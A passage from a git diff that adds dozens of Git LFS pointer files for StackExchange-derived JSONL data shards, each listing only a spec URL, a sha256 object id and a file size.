+++ b/data/stackexchange/1-1/2139_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9491c73deb80989804b59f411c514bfbb5bf0128658adbd7b8f5294ee9be6c5a +size 33673405 diff --git a/data/stackexchange/1-1/213_2289.jsonl b/data/stackexchange/1-1/213_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..296e1257ccd318a46082e45caadbd27e108f0e0f --- /dev/null +++ b/data/stackexchange/1-1/213_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02768d828ad21e6e8727dcf5973ddae0fd8c51204d88495e2335cf5395496bef +size 37711606 diff --git a/data/stackexchange/1-1/2140_2289.jsonl b/data/stackexchange/1-1/2140_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b46117d79bee56adb69d8c5d9f768afd179450da --- /dev/null +++ b/data/stackexchange/1-1/2140_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9f024bf970e59face2a9bb9496fd3e17819cd45be4eed732fdf11234f6c6df0a +size 34016732 diff --git a/data/stackexchange/1-1/2141_2289.jsonl b/data/stackexchange/1-1/2141_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..89d764304b9f48f7c745c9c3ed27c698c3173aea --- /dev/null +++ b/data/stackexchange/1-1/2141_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec20779f68f3e49b3f52cdb09d5a65a718286e5fab14ba8cd49ae2ea6fb4ae79 +size 34492214 diff --git a/data/stackexchange/1-1/2142_2289.jsonl b/data/stackexchange/1-1/2142_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aca6109491ae060203924a69bf02ccbf3518c4ad --- /dev/null +++ b/data/stackexchange/1-1/2142_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95fb1881996130d27eb529325dafef1eaaa7419ebe53ed6690690a00180e8887 +size 34242572 diff --git a/data/stackexchange/1-1/2143_2289.jsonl b/data/stackexchange/1-1/2143_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..61d415c67d55142df7fc71ef6adf18ab78df1519 --- /dev/null +++ b/data/stackexchange/1-1/2143_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:57f04b1b01fcb2f3ab38f559a30cf0bd2ad398d3e3766cba127bd7cb953c6846 +size 33755031 diff --git a/data/stackexchange/1-1/2144_2289.jsonl b/data/stackexchange/1-1/2144_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..46f691b90cf1036be23090f6d39ae33a188b5d80 --- /dev/null +++ b/data/stackexchange/1-1/2144_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d4570c61f568041f3ee380f80dac9b7b359ff8a2d30b71b500e55822661dfcf9 +size 33744324 diff --git a/data/stackexchange/1-1/2145_2289.jsonl b/data/stackexchange/1-1/2145_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a8f2dd2b3431686de2825564a9a04589684f3110 --- /dev/null +++ b/data/stackexchange/1-1/2145_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:982e8eba2220c49ddba9523f0bc185060fe21755aec6a247c310aa99dc3a2375 +size 33818405 diff --git a/data/stackexchange/1-1/2146_2289.jsonl b/data/stackexchange/1-1/2146_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..682a39e127e6c182710a84adeb95b01303a4ee3c --- /dev/null +++ b/data/stackexchange/1-1/2146_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7cf8212b288ffb8e71f96a1458a0f6a9225b3622217b546683818fc41275987 +size 32884364 diff --git a/data/stackexchange/1-1/2147_2289.jsonl b/data/stackexchange/1-1/2147_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e14d3eb0b77fb3d9710238d3b37ff7e87013680a --- /dev/null +++ b/data/stackexchange/1-1/2147_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:6334013ccc62639746f9d4ba0d841e1ef54fd70fbf23e691abf83511d2de49ec +size 34136160 diff --git a/data/stackexchange/1-1/2148_2289.jsonl b/data/stackexchange/1-1/2148_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8a7c76cae41603ba46df5b27c14b70c7ed5e6ae6 --- /dev/null +++ b/data/stackexchange/1-1/2148_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b29fef1eb2263619ed12227efac96e0b37cc84cff8d50c54548367dd2bbd907 +size 33611836 diff --git a/data/stackexchange/1-1/2149_2289.jsonl b/data/stackexchange/1-1/2149_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..46df2f13b1e3a62dbb1087b7d360f9795bbf80f8 --- /dev/null +++ b/data/stackexchange/1-1/2149_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6047cf190bfb142405dfb0948a268e3cc462b85f47cdf61a1110411b9d50b3cd +size 33574284 diff --git a/data/stackexchange/1-1/214_2289.jsonl b/data/stackexchange/1-1/214_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c91ee8b175e9d774c9314cf09ef9e93f5facfa93 --- /dev/null +++ b/data/stackexchange/1-1/214_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:adb9cfc1df7f276a559b8e2db1671b99c70bea5a84204ca457e3cbaf44e4bdce +size 36709146 diff --git a/data/stackexchange/1-1/2150_2289.jsonl b/data/stackexchange/1-1/2150_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1779e9b9de88e2c81eae8ff13b8beeccb7eac83d --- /dev/null +++ b/data/stackexchange/1-1/2150_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73e40d1ec91c08751cb8e8588ad299b4627537351701ba673fe86b1b928ffc85 +size 33974110 diff --git a/data/stackexchange/1-1/2151_2289.jsonl b/data/stackexchange/1-1/2151_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ee4411262eca5ea6eff564d432574d1931a3295 --- /dev/null +++ b/data/stackexchange/1-1/2151_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:598192acbe4dc5673960d6e7df252ee0f3f891195367b36b9f112ed98788025f +size 33933096 diff --git a/data/stackexchange/1-1/2152_2289.jsonl b/data/stackexchange/1-1/2152_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d03eb1ee7728c31ef8652790613a0b88ffc989bd --- /dev/null +++ b/data/stackexchange/1-1/2152_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e38f4b16aedd7401673b66545ecabbcb8731faed36265e3366b5f7cd9a5e316b +size 33867363 diff --git a/data/stackexchange/1-1/2153_2289.jsonl b/data/stackexchange/1-1/2153_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..722628fea50e24bc525b4f93f2544158afb69774 --- /dev/null +++ b/data/stackexchange/1-1/2153_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3d08298b72bb795ae2a2f08b4738a62a1ac3cbaf70e9453d7ff1a9e849bb8196 +size 33389318 diff --git a/data/stackexchange/1-1/2154_2289.jsonl b/data/stackexchange/1-1/2154_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3ef3a242e88d474ba98967dd53234d60eb5a97f9 --- /dev/null +++ b/data/stackexchange/1-1/2154_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8c816545f9b9f31869fabce75a338b92d247f6c9eb9c8fbdca046e8da6652a5 +size 34006706 diff --git a/data/stackexchange/1-1/2155_2289.jsonl b/data/stackexchange/1-1/2155_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..68dd956348cde6fb04b67a3e7b281b4e7cfa6aca --- /dev/null +++ b/data/stackexchange/1-1/2155_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d15cb32764054d4272b6924a68a75d61de3cf693e52da898a05e77953cfe071 +size 33937963 diff --git a/data/stackexchange/1-1/2156_2289.jsonl b/data/stackexchange/1-1/2156_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..977da67fb1f0ffefa5b6c66706a3cce195cf1ee7 --- /dev/null +++ b/data/stackexchange/1-1/2156_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9d836f5d0cab8e0948b7d7dfa3be454ae63a8943fac303f99a3a5a3b7c11470 +size 34071821 diff --git a/data/stackexchange/1-1/2157_2289.jsonl b/data/stackexchange/1-1/2157_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..662d733270cc3c044f2ce74b3c0f0611932533c1 --- /dev/null +++ b/data/stackexchange/1-1/2157_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a1533a1fdcf9985f1fd8f48d559d1e55facfdc2bc9af04c412a2e24580f735b +size 34240276 diff --git a/data/stackexchange/1-1/2158_2289.jsonl b/data/stackexchange/1-1/2158_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d6b283236064ec21d017b5d1251d4cb83a27b56e --- /dev/null +++ b/data/stackexchange/1-1/2158_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a6fad01923b59c28b9f8bf3dd92b1c596128242b57a0f70506f541943cef94e +size 33804451 diff --git a/data/stackexchange/1-1/2159_2289.jsonl b/data/stackexchange/1-1/2159_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a292955bc36279b505b5679c183a87ba326d4cb --- /dev/null +++ b/data/stackexchange/1-1/2159_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a72935b191b54ac8fb5d15fa75c5ea69abcf40c762cd94941dd7f0551159b28 +size 33977548 diff --git a/data/stackexchange/1-1/215_2289.jsonl b/data/stackexchange/1-1/215_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5be9df87712a6183dee9fdcff0ab7325d3c270b5 --- /dev/null +++ b/data/stackexchange/1-1/215_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93752af3c971cdd366237a6fae29669fa208bc16ed0e341ac3efe3c5c4cb1e2f +size 37514738 diff --git a/data/stackexchange/1-1/2160_2289.jsonl b/data/stackexchange/1-1/2160_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..349a15ecf27ed858098fb527cff1bb656f489c12 --- /dev/null +++ b/data/stackexchange/1-1/2160_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:773a393824e418e569b404a3961f8bdc56a7a7a9ee5cd389289f97e8208a6348 +size 34221590 diff --git a/data/stackexchange/1-1/2161_2289.jsonl b/data/stackexchange/1-1/2161_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..44bf7a476417dcb3dfddbb9e2e3596840d8513f3 --- /dev/null +++ b/data/stackexchange/1-1/2161_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:721a93a9a6cda84ddb783991aeb653d788321e8a740098ff99f2b9399485f509 +size 33334052 diff --git a/data/stackexchange/1-1/2162_2289.jsonl b/data/stackexchange/1-1/2162_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18908f1931a8ec833edb43f87173605cc2d67644 --- /dev/null +++ b/data/stackexchange/1-1/2162_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:e782464e7e4cc3cc2b8831a9304d5938c002e10122469d97ddf4ae08d21ce84a +size 34019648 diff --git a/data/stackexchange/1-1/2163_2289.jsonl b/data/stackexchange/1-1/2163_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7bdcf3a473058b334ae6a8ca55fd9765de258e6c --- /dev/null +++ b/data/stackexchange/1-1/2163_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8002ed38be798545030c97dff3acdb896cb9c2dbace55be2e82b9c6032d7f0d +size 33577388 diff --git a/data/stackexchange/1-1/2164_2289.jsonl b/data/stackexchange/1-1/2164_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1bdff680e9210385dba04c6982c4fe9b0270b1cd --- /dev/null +++ b/data/stackexchange/1-1/2164_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:deae1b0197a0c7177477385d0b32577a80cbf0323fa66c9b2b0b78a29d766851 +size 34024087 diff --git a/data/stackexchange/1-1/2165_2289.jsonl b/data/stackexchange/1-1/2165_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..25b746435be450825d93fbf009e3d1e50f794085 --- /dev/null +++ b/data/stackexchange/1-1/2165_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f9c45a4b6a021ecc5e39fefea0f53ccf9d349e778d936f0d2c32ea8fa0ec3373 +size 33837081 diff --git a/data/stackexchange/1-1/2166_2289.jsonl b/data/stackexchange/1-1/2166_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..62a4bffa8612524d6d29b13968d51d56fed44646 --- /dev/null +++ b/data/stackexchange/1-1/2166_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9c213c4acfc8a83a62e535506334b85eaf5c1bc838ef8b78c8115f070db2e11b +size 34554210 diff --git a/data/stackexchange/1-1/2167_2289.jsonl b/data/stackexchange/1-1/2167_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9b163487b690f47b60be6b4ecbd62d5108c9e913 --- /dev/null +++ b/data/stackexchange/1-1/2167_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c198a4c654873d11b572d6d4a694283319f0ed96be68ddcfe6c655124fc56e01 +size 33952261 diff --git a/data/stackexchange/1-1/2168_2289.jsonl b/data/stackexchange/1-1/2168_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..112451eeaa42518562635699484945b8eb134d74 --- /dev/null +++ b/data/stackexchange/1-1/2168_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e329be5342d3eb0caf19bf923a03f1e6bde3a50bf00baa2600e45df5706988c8 +size 33690451 diff --git a/data/stackexchange/1-1/2169_2289.jsonl b/data/stackexchange/1-1/2169_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ee49c4ae8bdc3832d99f92de147609dd768ee5d7 --- /dev/null +++ b/data/stackexchange/1-1/2169_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6ac379446224e0a2480e40f82a745a7988e0b995984ac798267ea69e3f7cbd9 +size 33931510 diff --git a/data/stackexchange/1-1/216_2289.jsonl b/data/stackexchange/1-1/216_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c9ce55ec883ca66dc008992fce45c0da8d0083ab --- /dev/null +++ b/data/stackexchange/1-1/216_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05ac67be2d6613b477221fe6d588cfca671c07ef63141d3382119add69a46111 +size 37372273 diff --git a/data/stackexchange/1-1/2170_2289.jsonl b/data/stackexchange/1-1/2170_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..d3fbd35a6cb816e3b38687b3732b7984a621a590 --- /dev/null +++ b/data/stackexchange/1-1/2170_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e66f934bc6aa12a5d23d8b1f54af8f57c377299cbd767987818d412929ee9d59 +size 33906443 diff --git a/data/stackexchange/1-1/2171_2289.jsonl b/data/stackexchange/1-1/2171_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7ea4c8c0518c0363144a3e40853943649c6c33d1 --- /dev/null +++ b/data/stackexchange/1-1/2171_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12ad5d0934f2134cf4294e8dadfa65ffdaebd85a234c559f1f4fe301bb1ded20 +size 33935623 diff --git a/data/stackexchange/1-1/2172_2289.jsonl b/data/stackexchange/1-1/2172_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..72aa3cb2b7bf54cf30ec467a22c2dabd8e0b7d62 --- /dev/null +++ b/data/stackexchange/1-1/2172_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f5e755f9a7a4223455e5754dda76be5e4b710bd621246d1213a59135f22ac405 +size 33752032 diff --git a/data/stackexchange/1-1/2173_2289.jsonl b/data/stackexchange/1-1/2173_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e7d0fcb610f4094ed7febd934029ff37179cb530 --- /dev/null +++ b/data/stackexchange/1-1/2173_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a623bd002f935a1f393c188af9e6e5adcf279be09b98d273f360e2faa083bf1c +size 33951012 diff --git a/data/stackexchange/1-1/2174_2289.jsonl b/data/stackexchange/1-1/2174_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..45b7071b7bd835a4dc95de079da8e75be41167fd --- /dev/null +++ b/data/stackexchange/1-1/2174_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4e66773908710163d7912764d3c97008ac1d821c7524881dea9746cc449dfab9 +size 34256795 diff --git a/data/stackexchange/1-1/2175_2289.jsonl b/data/stackexchange/1-1/2175_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5608d11325eae5fd9868b53439b2f1d0d4a5363f --- /dev/null +++ b/data/stackexchange/1-1/2175_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbf05ab4370c0ff5f86d3df4692534328af2a40f7ef23ecd70756bf8400eb6df +size 34072236 diff --git a/data/stackexchange/1-1/2176_2289.jsonl b/data/stackexchange/1-1/2176_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e3eeae2ba648711fd310f4930b6536e901e15d1d --- /dev/null +++ b/data/stackexchange/1-1/2176_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b98b565ef6ef1a1bb62f5f4b0c963d4f371d07aa0a0a1c77ace9a26f84e98ccc +size 34069127 diff --git a/data/stackexchange/1-1/2177_2289.jsonl b/data/stackexchange/1-1/2177_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f4b35ff5bc1dffdec51807e2c10f7f6b66819b82 --- /dev/null +++ b/data/stackexchange/1-1/2177_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:47ab77b142aee2638ddbde4f982b37a7e1a050c4fba0b248b1dfce4787c4eb8f +size 33850721 diff --git a/data/stackexchange/1-1/2178_2289.jsonl b/data/stackexchange/1-1/2178_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..75ea80e6804b8383758cd399cf8f21924198300d --- /dev/null +++ b/data/stackexchange/1-1/2178_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:f1812c056fb644669f3fe4320d8e932fe24f5b05363ea566774b0db0c0388c37 +size 33527965 diff --git a/data/stackexchange/1-1/2179_2289.jsonl b/data/stackexchange/1-1/2179_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6ebf082b8b705209869606285e093fde0d96c8f4 --- /dev/null +++ b/data/stackexchange/1-1/2179_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e2ad9694ccd2399a268a3a702c4934a9fc235dbfef603360da8c1233d2f9ae5 +size 34142816 diff --git a/data/stackexchange/1-1/217_2289.jsonl b/data/stackexchange/1-1/217_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..278e84d2de6519924f7125869d4a159db1eae412 --- /dev/null +++ b/data/stackexchange/1-1/217_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d1e99c2326e0c9560411de794dc18c0fc6ed6c37cadd7657159d7d158240d84 +size 37515132 diff --git a/data/stackexchange/1-1/2180_2289.jsonl b/data/stackexchange/1-1/2180_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..93a025043e43ecc4354615e6e78242d94e809370 --- /dev/null +++ b/data/stackexchange/1-1/2180_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:035b30f4c6d1cc1decf84fa1ef89f25cfad463fe81b84cb65e270129bfbc0c6a +size 33703924 diff --git a/data/stackexchange/1-1/2181_2289.jsonl b/data/stackexchange/1-1/2181_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..132b70ebb18a08b6665e5d112a7e6963256d7650 --- /dev/null +++ b/data/stackexchange/1-1/2181_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b8004bd97b89eda8eb909f85a39da123a1a394c9d984ee5b406d147c247767a +size 34313934 diff --git a/data/stackexchange/1-1/2182_2289.jsonl b/data/stackexchange/1-1/2182_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eec32fe0b664af6bd4669d7a80363b68025e9d07 --- /dev/null +++ b/data/stackexchange/1-1/2182_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e0cf49b18eb1310b0d57f591ae833e3c9affeedbb8bed47b8a21012e74bb81b +size 34240652 diff --git a/data/stackexchange/1-1/2183_2289.jsonl b/data/stackexchange/1-1/2183_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9828d266695878a5c395fdd62b75659f479f433f --- /dev/null +++ b/data/stackexchange/1-1/2183_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b226b56c36dc4b887ba9cc79f594cb37d3a867d70f340b78c269932f300044ae +size 33695512 diff --git a/data/stackexchange/1-1/2184_2289.jsonl b/data/stackexchange/1-1/2184_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..da28759da8ccd82b53fd3500d7d05eb95bce780f --- /dev/null +++ b/data/stackexchange/1-1/2184_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c92b6b8875b464edcaf705cfe14d3b8db9eddaed8f76e9119abd23399d51c5a9 +size 34732166 diff --git a/data/stackexchange/1-1/2185_2289.jsonl b/data/stackexchange/1-1/2185_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..10c95a54c0e8ccb1b1cb613ece3a25e81127dcbe --- /dev/null +++ b/data/stackexchange/1-1/2185_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6fa4d0e67af49daa1b748bb787ebea715d6bc745c8a2fd21ab8bdbcdaa40257e +size 33535363 diff --git a/data/stackexchange/1-1/2186_2289.jsonl b/data/stackexchange/1-1/2186_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..67c86c5bdb4dfdf142b89aa4e6bddcee6efba275 --- /dev/null +++ b/data/stackexchange/1-1/2186_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93b3afa45d60912da048f674afe6ef120e8ae3622f22b4905fb6dd307397116b +size 33973059 diff --git a/data/stackexchange/1-1/2187_2289.jsonl b/data/stackexchange/1-1/2187_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0fb359f933a452ee66dcfcad4946659f604ce6ca --- /dev/null +++ b/data/stackexchange/1-1/2187_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bab6ca9194bc56c4d36c6dc9cba06c450b74feb583f840a348c5df74286a10cd +size 33812484 diff --git a/data/stackexchange/1-1/2188_2289.jsonl b/data/stackexchange/1-1/2188_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ec31379af8495a400b715fe745b69d5dc2c228ed --- /dev/null +++ b/data/stackexchange/1-1/2188_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ebd4a09d8bead9d1cd86e673f106d8c9d859e711e5169c32a86863540b8afba6 +size 33866108 diff --git a/data/stackexchange/1-1/2189_2289.jsonl b/data/stackexchange/1-1/2189_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..21a7f52bb1042b30c473e8a944f9c6e440635772 --- /dev/null +++ b/data/stackexchange/1-1/2189_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:225779202ec193db911118be7748ac4cd3157107caf1ebd0d2de772519c71b31 +size 38474522 diff --git a/data/stackexchange/1-1/218_2289.jsonl b/data/stackexchange/1-1/218_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0444ba9cca401b53bfe07f5a45d18dd11876bcc --- /dev/null +++ b/data/stackexchange/1-1/218_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71c8c517a54865e78f790a7575ff757a65439e54c26b9fe32c03eb85240f2fbb +size 37383238 diff --git a/data/stackexchange/1-1/2190_2289.jsonl b/data/stackexchange/1-1/2190_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f4c61323a2efe49d5b2b9c11a3ea8fb8f5114988 --- /dev/null +++ b/data/stackexchange/1-1/2190_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b86bd213b3b00dfd8c932ed1efec320bf61f561f2fe0eb9dfe7da25052cb4c7 +size 39348988 diff --git a/data/stackexchange/1-1/2191_2289.jsonl b/data/stackexchange/1-1/2191_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..19a5673d81bef5967a2943082a4e3becd9f786f7 --- /dev/null +++ b/data/stackexchange/1-1/2191_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94ecadeda091348b2e16cd49f36fdc1f4eabd1c9aa99ce41820104dd02796390 +size 40476113 diff --git a/data/stackexchange/1-1/2192_2289.jsonl b/data/stackexchange/1-1/2192_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..deafac47b9bf17d5416d1b204e8cdb8cdedba71e --- /dev/null +++ b/data/stackexchange/1-1/2192_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:061a830f41889ef0e1a8e798cf54b6d58ba1b4b562caf7afe8e0bf4baeb3e8d5 +size 39231403 diff --git a/data/stackexchange/1-1/2193_2289.jsonl b/data/stackexchange/1-1/2193_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..edbbf182fdc3a757f5beb8fe8ac59fd2cba8415a --- /dev/null +++ b/data/stackexchange/1-1/2193_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:b87227cc1933df398c5cbeb40749d643f6e0804f101137dc5658bf47f71910b0 +size 39005409 diff --git a/data/stackexchange/1-1/2194_2289.jsonl b/data/stackexchange/1-1/2194_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..115de84ffcd6c8857602de78eea705abee6312ea --- /dev/null +++ b/data/stackexchange/1-1/2194_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0490c325374be3f0abd605823a8ed219340838b74bee088b9b762151f7825d31 +size 40023155 diff --git a/data/stackexchange/1-1/2195_2289.jsonl b/data/stackexchange/1-1/2195_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..db2040d4da594d3d31c7ebe12cedc89095592959 --- /dev/null +++ b/data/stackexchange/1-1/2195_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a95ed8fba748fb9fb399ce90847539ca90cfdac7bb2f8eb9655e093e750bb662 +size 38871684 diff --git a/data/stackexchange/1-1/2196_2289.jsonl b/data/stackexchange/1-1/2196_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f6c4fad3ea3cf231c4c2e625613b6abbcaf8f2d --- /dev/null +++ b/data/stackexchange/1-1/2196_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f7e8b4a862be6f5355681afc913d5c06c19efc56b67236dc09a14c9847bf5f9 +size 39902224 diff --git a/data/stackexchange/1-1/2197_2289.jsonl b/data/stackexchange/1-1/2197_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3b8b915eb4ab0622b51a8229ccb4828d621e0c41 --- /dev/null +++ b/data/stackexchange/1-1/2197_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:25874c98487410a3e9db16b37997c0ced648d506d1bf3c37c4f1b3efb65bcce3 +size 39047943 diff --git a/data/stackexchange/1-1/2198_2289.jsonl b/data/stackexchange/1-1/2198_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..511c611e8ece06e2cb10c7ae1c1a56094acfb2ca --- /dev/null +++ b/data/stackexchange/1-1/2198_2289.jsonl @@ 